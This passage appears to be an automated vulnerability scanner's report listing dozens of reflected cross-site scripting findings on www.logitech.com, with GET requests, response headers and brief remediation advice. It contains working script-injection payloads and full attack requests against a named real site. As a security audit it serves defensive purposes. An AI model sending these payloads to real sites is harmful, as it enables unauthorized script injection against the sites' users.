Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/webcam_communications/video_software_services1af88"><script>alert(1)</script>18c9552ae81/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4fae</script><script>alert(1)</script>ab8452fd699 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/webcam_communications/video_software_services/4290c4fae</script><script>alert(1)</script>ab8452fd699&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc513"><script>alert(1)</script>abd2179028e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/webcam_communications/video_software_services/4290fc513"><script>alert(1)</script>abd2179028e&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a914"><script>alert(1)</script>91f0f452222 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript9a914"><script>alert(1)</script>91f0f452222/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fa8d</script><script>alert(1)</script>33a5d13a35c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript8fa8d</script><script>alert(1)</script>33a5d13a35c/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4035</script><script>alert(1)</script>ee7e4532d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascriptf4035</script><script>alert(1)</script>ee7e4532d89/swfobject.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dffc"><script>alert(1)</script>01de07faf7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript8dffc"><script>alert(1)</script>01de07faf7c/swfobject.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23f42</script><script>alert(1)</script>651c2e1d3b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/swfobject.js23f42</script><script>alert(1)</script>651c2e1d3b2 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d095"><script>alert(1)</script>b0434b12abd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/swfobject.js5d095"><script>alert(1)</script>b0434b12abd HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d762"><script>alert(1)</script>a35debed1ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript7d762"><script>alert(1)</script>a35debed1ad/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79d3</script><script>alert(1)</script>353175fe389 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascriptd79d3</script><script>alert(1)</script>353175fe389/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c751</script><script>alert(1)</script>5f874b96d40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v27c751</script><script>alert(1)</script>5f874b96d40/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 311cb"><script>alert(1)</script>b0eaf8355dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2311cb"><script>alert(1)</script>b0eaf8355dc/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10ed8</script><script>alert(1)</script>c52fc7e9fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript10ed8</script><script>alert(1)</script>c52fc7e9fc/v2/category.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8277"><script>alert(1)</script>e2821256ccf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascriptd8277"><script>alert(1)</script>e2821256ccf/v2/category.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef904"><script>alert(1)</script>2ad96cfb116 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2ef904"><script>alert(1)</script>2ad96cfb116/category.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0f54</script><script>alert(1)</script>cf2f07ec66a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2a0f54</script><script>alert(1)</script>cf2f07ec66a/category.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedf1</script><script>alert(1)</script>388324e8fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/category.jsaedf1</script><script>alert(1)</script>388324e8fa HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3abf5"><script>alert(1)</script>f8bef867d65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/category.js3abf5"><script>alert(1)</script>f8bef867d65 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d70"><script>alert(1)</script>d6eaf975114 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript37d70"><script>alert(1)</script>d6eaf975114/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c</script><script>alert(1)</script>1f33f980c91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript86b9c</script><script>alert(1)</script>1f33f980c91/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15124"><script>alert(1)</script>ff87ad28995 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v215124"><script>alert(1)</script>ff87ad28995/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670e7</script><script>alert(1)</script>cb617b500e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2670e7</script><script>alert(1)</script>cb617b500e0/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b7d"><script>alert(1)</script>4d0a2981cb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn86b7d"><script>alert(1)</script>4d0a2981cb7/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 537f3</script><script>alert(1)</script>95518b46dbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn537f3</script><script>alert(1)</script>95518b46dbc/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3043</script><script>alert(1)</script>3f695f4c8cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6276"><script>alert(1)</script>751b688eae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b75f</script><script>alert(1)</script>f700a6d213d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19cd0"><script>alert(1)</script>cb0bd6d2235 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2a04</script><script>alert(1)</script>ad923ca47cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
